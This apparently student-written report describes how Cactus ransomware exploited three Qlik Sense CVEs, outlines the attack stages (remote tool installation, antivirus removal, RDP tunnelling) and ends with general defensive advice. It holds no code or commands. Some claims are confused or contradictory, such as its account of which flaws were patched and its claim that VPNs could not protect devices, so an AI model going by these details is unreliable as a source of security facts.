Recently, the Qlik Sense Enterprise business platform has been under continuous attack by a new ransomware known as Cactus (Newsroom, 2023.) This ransomware is notorious for being the first documented incident of a threat actor exploiting a vulnerability to gain initial access to Qlik Sense Enterprise’s systems. This attack was done through the usage of three recently-discovered vulnerabilities, two of which had been given a critical score by the NVD.
The vulnerabilities used in the attack against Qlik Sense Enterprise were CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365 (Newsroom, 2023.) The first of these vulnerabilities relates to HTTP and allows a threat actor to use tunneling to elevate their privileges. Given the extreme danger of this possibility, CVE-2023-41265 was given a score of 9.9 – critical by both the NVD and MITRE.
The second of the three vulnerabilities used by Cactus ransomware, CVE-2023-41266 is a path traversal vulnerability unique to Qlik Sense Enterprise for Windows. It, like CVE-2023-41265, relies on the system of HTTP requests. To be exact, CVE-2023-41266 allows a threat actor to generate anonymous sessions which allow them to transmit HTTP requests without authorization to certain endpoints. Due to its reliance on the exploitation of a separate vulnerability, however, CVE-2023-41266 was given a score of 6.5 – medium by the NVD and 8.2 – high by MITRE.
The third vulnerability exploited by the Cactus ransomware, CVE-2023-48365 also works through unauthorized usage of HTTP. This vulnerability is what allows code to be executed remotely by an unauthorized threat actor. It was created by an incomplete fix of CVE-2023-41265. While it is true that it relies on another vulnerability in order to be used properly, CVE-2023-48365 has been given a score of 9.9 – Critical by the NVD and 9.6 – Critical by MITRE. This is because of how dangerous it is. It is especially dangerous for Qlik Sense Enterprise for Windows systems that have not yet received the August 2023 Patch 2, given that patch was the one that resolved much of what allowed CVE-2023-48365 to be exploited.
These three vulnerabilities were all key parts of a multi-stage attack that ended up posing a threat to Qlik Sense Enterprise on a scale that had never before been seen in the platform’s history. The attack resulted in large-scale theft of users’ information and money. The former of which was then encrypted in order to receive more of the latter (Toulas, 2023.)
The first stage of the Cactus ransomware attack was exploiting security issues in the HTTP code used by Qlik. This was done to cause the Qlik Sense Scheduler to initiate a new process, which could be used by the threat actor (Toulas, 2023.) Ultimately, this gave the threat actor access to the target’s device which could be used to commence stage two of the attack.
The second stage of the Cactus ransomware attack involved using PowerShell and the Background Intelligent Transfer Service to download the tools the threat actor needed to maintain a persistent presence on the target’s device. These tools – namely ManageEngine UEMS, AnyDesk, and a PuTTY Link binary (Toulas, 2023) – were either disguised or installed in such a way that the user would never suspect them to be part of a ransomware attack against their device.
Once this connection was established, the threat actors would execute discovery commands that would redirect their output into .TTF files. Though the reason for this particular action is not yet confirmed, Arctic Wolf researchers believe the reason to be so that the threat actor can obtain command output through path traversal (Toulas, 2023.)
Following the execution of these discovery commands, the threat actor would proceed to stay hidden for a prolonged period of time. Doing subtle things to make the final stage of the attack easier. These include uninstalling antivirus, changing the administrator password, and establishing an RDP tunnel with the PuTTY Link command-line connection tool (Toulas, 2023.) Once those final steps were completed, the threat actor would move onto the final stage of the attack.
That stage being the installation of the Cactus ransomware onto the victim’s computer. The ransomware, due to its unique programming and the extreme level of prior infiltration done by the threat actor before even installing it onto a target’s computer, would install itself no matter what the target still had to possibly protect their device. No antivirus, not even a VPN, could protect a target’s computer from the Cactus ransomware (Magar, 2023.)
Yet even after successfully infecting a device, Cactus ransomware’s work was not done. Upon installation, Cactus would encrypt itself. Then, the encrypted file would be divided into even smaller files known as micro-buffers (Magar, 2023.) All this to prevent detection and force the victim to pay the ransom demanded by the threat actor.
Due to all of these aforementioned properties, Cactus ended up causing severe damage. Not just in the form of the ransom it demanded from users, who had been left no choice but to pay, but also in the form of regulatory fees and disrupted services (Magar, 2023.) The exact figures of this damage are not yet known due to how recently the Cactus ransomware attacks took place and the fact that they might still be ongoing. The fact that the majority of these targets have been relatively high-profile has no doubt augmented the damage caused by Cactus ransomware.
While the full resolution of the Cactus ransomware attacks is still in-progress organizations such as the NIST, CISA, and SANS have provided their insight on general security practices that can prevent ransomware attacks in general from occurring. These include things such as an enforcement of two-factor authentication for all services, but especially those used for communication (Magar, 2023.)
Another guideline provided by these organizations is a policy of frequent risk assessments. This policy would allow the cybersecurity team of a company to identify and prioritize the threats and vulnerabilities that threaten a given network (Magar, 2023.)
Additionally, the organizations recommended a policy of strong passwords that are to be frequently changed (Magar, 2023.) This would make brute force attacks essentially impossible. The frequent changing would also give threat actors a very small window of time before the information they may have stolen through a database leak is rendered obsolete.
The aforementioned two are among a list of sixteen general recommendations made to increase cyber-security as a whole. But for the Cactus ransomware specifically, the best thing one can do is make sure that they make sure their installation of Qlik Sense Enterprise is up-to-date. Making sure to download any updates or patches that come out in the future.
It is a good general policy to keep software up-to-date due to the fact that updates oftentimes patch the vulnerabilities threat actors use to gain unauthorized access and cause harm to a network. A relevant example of this is the fact that on September 20, 2023, a patch for CVE-2023-48365 was shipped out (Newsroom, 2023.) While the other two vulnerabilities used by Cactus have yet to be patched, the patching of CVE-2023-48365 poses a serious challenge to future threat actors attempting to infect patched devices with Cactus. This is because of how critical CVE-2023-48365 was to the attack process as a whole. Without the elevated privileges the vulnerability allows a threat actor to possess, it is impossible to do things such as changing the administrator password that are necessary for the attack to go forward.
That said, there is still much to be done to resolve the issues that allow Cactus ransomware to earn its spot as Darkfeed’s seventh most prevalent ransomware in the month of November (Magar, 2023.) The main issue that is being resolved is its ability to bypass VPNs (Magar, 2023.) VPNs, or Virtual Private Networks, are a technology that allows a user to assign a different IP address to their device. Many also come with antivirus measures and other security measures.
While this wave of ransomware attacks did first shed public light on the potential to hack virtual private networks, the CACTUS group behind this eponymous attack is believed to have a degree of experience in bypassing Virtual Private Networks, with it being seen by some as a modus operandi of sorts for the group (Khaitan, 2023.) Besides their sophisticated methods and the moniker they provide in the ransom note left on infected devices, very little is known about CACTUS and their motives. Because of this, it has become almost impossible for law enforcement and private investigators to determine why CACTUS is doing what they do.
In conclusion, the Cactus ransomware attacks that started in March of 2023 were among the most sophisticated attacks ever deployed. They were done using a collection of HTTP exploits that allowed threat actors to gain unauthorized access to a target device. Once access was gained, they would subtly collect data and mask their presence within the device. Only after a long process of data collection and tampering would the ransomware be released, at that point able to bypass VPNs. The only thing one can do at this moment to mitigate the risk of Cactus ransomware is practice common cyber-security best practices. The group behind the ransomware, CACTUS, is shrouded in mystery and has as-of-now unknown motives.
References:
Khaitan, A. (2023, September 6). Cactus Ransomware Group hits 5 Global Corporations, Marfrig, Seymours among victims. The Cyber Express. https://thecyberexpress.com/cactus-ransomware-group-major-corporations/
Magar, B. T. (2023, November 24). Cactus, a new player in the ransomware game – is it the last?. Logpoint. https://www.logpoint.com/en/blog/emerging-threat/cactus-a-new-player-in-the-ransomware-game/
Newsroom. (2023, November 30). Cactus ransomware exploits qlik sense vulnerabilities in targeted attacks. The Hacker News. https://thehackernews.com/2023/11/cactus-ransomware-exploits-qlik-sense.html
NVD. (2023, September 8). CVE-2023-41265 Detail. https://nvd.nist.gov/vuln/detail/CVE-2023-41265
NVD. (2023a, August 29). CVE-2023-41266 Detail. https://nvd.nist.gov/vuln/detail/CVE-2023-41266
NVD. (2023c, November 15). CVE-2023-48365 Detail. https://nvd.nist.gov/vuln/detail/CVE-2023-48365
Toulas, B. (2023, November 30). Cactus ransomware exploiting qlik sense flaws to breach networks. BleepingComputer. https://www.bleepingcomputer.com/news/security/cactus-ransomware-exploiting-qlik-sense-flaws-to-breach-networks/